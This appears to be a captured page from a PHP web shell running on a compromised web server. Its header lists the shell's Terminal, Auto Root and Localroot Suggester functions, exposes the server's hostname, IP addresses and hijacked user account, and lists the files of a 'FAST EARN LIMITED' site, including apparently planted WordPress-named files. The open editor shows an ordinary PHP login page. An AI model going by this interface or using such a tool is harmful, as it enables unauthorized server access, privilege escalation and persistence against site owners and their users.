Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
abayar /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2026-01-09 22:13
admin
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
assets
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
fast-earn-limited
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
includes
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
uploads
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
user
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
ADMIN_LOGIN.txt
13.54
KB
-rw-r--r--
2025-12-22 19:34
COMPLETION.txt
20.92
KB
-rw-r--r--
2025-12-22 19:22
FEATURES.txt
16.92
KB
-rw-r--r--
2025-12-22 19:13
FIX_DATABASE_ERROR.txt
8.7
KB
-rw-r--r--
2025-12-22 19:37
FIX_UPLOAD_ERROR.txt
10.1
KB
-rw-r--r--
2025-12-22 19:45
INSTALLATION.txt
8.73
KB
-rw-r--r--
2025-12-22 19:12
PROJECT_STATUS.txt
12.33
KB
-rw-r--r--
2025-12-22 19:14
QUICK_START.txt
14.12
KB
-rw-r--r--
2025-12-22 19:15
README.md
10.54
KB
-rw-r--r--
2025-12-22 19:11
V2_UPGRADE_NOTES.txt
5.88
KB
-rw-r--r--
2025-12-22 20:04
checkout.php
16.2
KB
-rw-r--r--
2026-01-07 16:26
contact.php
6.71
KB
-rw-r--r--
2026-01-07 16:36
create_folders.php
2.91
KB
-rw-r--r--
2025-12-22 19:44
database.sql
9.14
KB
-rw-r--r--
2025-12-22 19:52
full_setup.php
29.74
KB
-rw-r--r--
2026-01-26 16:55
index.php
30.43
KB
-rw-r--r--
2026-01-07 16:56
login.php
8.83
KB
-rw-r--r--
2025-12-30 13:45
logout.php
151
B
-rw-r--r--
2025-12-22 19:01
products.php
4.69
KB
-rw-r--r--
2026-01-07 16:39
register.php
14.14
KB
-rw-r--r--
2025-12-30 13:25
seed_products.php
559
B
-rw-r--r--
2026-01-07 16:15
update_database.sql
781
B
-rw-r--r--
2025-12-22 19:36
update_db.php
4.07
KB
-rw-r--r--
2025-12-22 19:36
update_db_v10.php
816
B
-rw-r--r--
2025-12-24 21:22
update_db_v11.php
681
B
-rw-r--r--
2025-12-24 21:53
update_db_v12.php
590
B
-rw-r--r--
2026-01-07 16:12
update_db_v2.php
2.13
KB
-rw-r--r--
2025-12-22 19:53
update_db_v3.php
2.76
KB
-rw-r--r--
2025-12-22 20:05
update_db_v4.php
1.43
KB
-rw-r--r--
2025-12-22 20:11
update_db_v5.php
1.9
KB
-rw-r--r--
2025-12-23 19:11
update_db_v6.php
1.91
KB
-rw-r--r--
2025-12-23 19:29
update_db_v7.php
3.05
KB
-rw-r--r--
2025-12-23 19:33
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php require_once 'includes/config.php'; // Redirect if already logged in if (isLoggedIn()) { if (isAdmin()) { header('Location: admin/dashboard.php'); } else { header('Location: user/dashboard.php'); } exit; } // Handle login if ($_SERVER['REQUEST_METHOD'] === 'POST') { $email_or_phone = trim($_POST['email_or_phone']); $password = $_POST['password']; if (empty($email_or_phone) || empty($password)) { setError("Please enter email/phone and password"); } else { // Check if input is email or phone (only for regular users, not admin) $stmt = $pdo->prepare("SELECT * FROM users WHERE (email = ? OR phone = ?) AND role = 'user'"); $stmt->execute([$email_or_phone, $email_or_phone]); $user = $stmt->fetch(); if ($user && password_verify($password, $user['password'])) { // Check if account is active if ($user['status'] !== 'active') { setError("Your account is " . $user['status'] . ". Please contact support."); } else { // Login successful $_SESSION['user_id'] = $user['id']; $_SESSION['user_name'] = $user['full_name']; $_SESSION['user_email'] = $user['email']; $_SESSION['role'] = $user['role']; // Redirect to user dashboard header('Location: user/dashboard.php'); exit; } } else { setError("Invalid email/phone or password"); } } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Login | <?php echo getSetting('site_name'); ?></title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"> <link href="https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800&family=Outfit:wght@400;600;800&display=swap" rel="stylesheet"> <style> :root { --p: #00ffa3; --bg: #060912; --card: #121826; --text: #ffffff; --dim: #94a3b8; --border: rgba(255, 255, 255, 0.08); } * { margin: 0; padding: 0; box-sizing: border-box; font-family: 'Plus Jakarta Sans', sans-serif; } body { background-color: var(--bg); color: var(--text); min-height: 100vh; display: flex; align-items: center; justify-content: center; position: relative; overflow: hidden; } .bg-glow { position: absolute; width: 100%; height: 100%; z-index: -1; background: radial-gradient(circle at 50% 50%, rgba(0, 255, 163, 0.05) 0%, transparent 70%); } .auth-container { width: 100%; max-width: 450px; padding: 20px; position: relative; z-index: 10; } .auth-card { background: rgba(18, 24, 38, 0.8); backdrop-filter: blur(20px); border: 1px solid var(--border); border-radius: 30px; padding: 45px; box-shadow: 0 40px 100px rgba(0, 0, 0, 0.5); } .auth-header { text-align: center; margin-bottom: 40px; } .auth-header .logo-box { font-size: 36px; color: var(--p); margin-bottom: 20px; display: inline-block; filter: drop-shadow(0 0 10px rgba(0, 229, 255, 0.2)); } .auth-header h1 { font-family: 'Outfit', sans-serif; font-size: 30px; font-weight: 800; margin-bottom: 10px; } .auth-header p { color: var(--dim); font-size: 15px; } .form-group { margin-bottom: 25px; } .form-label { display: block; margin-bottom: 10px; font-size: 13px; font-weight: 700; color: var(--dim); text-transform: uppercase; letter-spacing: 1px; } .form-control { width: 100%; background: rgba(255, 255, 255, 0.03); border: 1px solid var(--border); border-radius: 12px; padding: 15px 20px; color: white; font-size: 15px; transition: 0.3s; outline: none; } .form-control:focus { border-color: var(--p); background: rgba(255, 255, 255, 0.06); box-shadow: 0 0 0 4px rgba(0, 255, 163, 0.1); } .btn-submit { width: 100%; background: var(--p); color: #000; border: none; padding: 16px; border-radius: 12px; font-size: 16px; font-weight: 800; cursor: pointer; transition: 0.3s; display: flex; align-items: center; justify-content: center; gap: 10px; margin-top: 10px; box-shadow: 0 10px 20px rgba(0, 255, 163, 0.1); } .btn-submit:hover { transform: translateY(-2px); box-shadow: 0 15px 30px rgba(0, 255, 163, 0.2); } .auth-footer { text-align: center; margin-top: 35px; color: var(--dim); font-size: 14px; } .auth-footer a { color: var(--p); text-decoration: none; font-weight: 700; } .alert { padding: 15px; border-radius: 12px; margin-bottom: 25px; font-size: 14px; text-align: center; } .alert-danger { background: rgba(239, 68, 68, 0.1); color: #ef4444; border: 1px solid rgba(239, 68, 68, 0.2); } .alert-success { background: rgba(16, 185, 129, 0.1); color: #10b981; border: 1px solid rgba(16, 185, 129, 0.2); } .back-home { position: absolute; top: 40px; left: 40px; color: var(--dim); text-decoration: none; font-size: 14px; display: flex; align-items: center; gap: 10px; transition: 0.3s; } .back-home:hover { color: white; } @media (max-width: 480px) { .auth-card { padding: 35px 25px; } .back-home { top: 20px; left: 20px; } } </style> </head> <body> <div class="bg-glow"></div> <a href="index.php" class="back-home"> <i class="fas fa-arrow-left"></i> Home </a> <div class="auth-container"> <div class="auth-card"> <div class="auth-header"> <div class="logo-box"><i class="fas fa-bolt"></i></div> <h1>Login Now</h1> <p>Welcome back to FAST EARN LIMITED</p> </div> <?php $success = getSuccess(); if ($success) echo '<div class="alert alert-success">' . htmlspecialchars($success) . '</div>'; $error = getError(); if ($error) echo '<div class="alert alert-danger">' . htmlspecialchars($error) . '</div>'; ?> <form method="POST" action=""> <div class="form-group"> <label class="form-label">Email or Phone</label> <input type="text" name="email_or_phone" class="form-control" placeholder="Enter credentials" required> </div> <div class="form-group"> <label class="form-label">Password</label> <input type="password" name="password" class="form-control" placeholder="••••••••" required> </div> <button type="submit" class="btn-submit"> Unlock Account <i class="fas fa-unlock"></i> </button> </form> <div class="auth-footer"> Don't have an account? <a href="register.php">Join Now</a> </div> </div> </div> </body> </html>